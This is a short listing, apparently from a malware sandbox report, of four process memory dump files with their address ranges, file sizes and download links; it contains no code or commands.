Download
memory/4192-285-0x0000000001460000-0x000000000146C000-memory.dmp

Filesize
48KB

Download
memory/4796-391-0x00000219B0CA0000-0x00000219B0D16000-memory.dmp

Filesize
472KB

Download
memory/5108-181-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download
memory/5108-180-0x0000000077C70000-0x0000000077DFE000-memory.dmp

Filesize
1.6MB

Download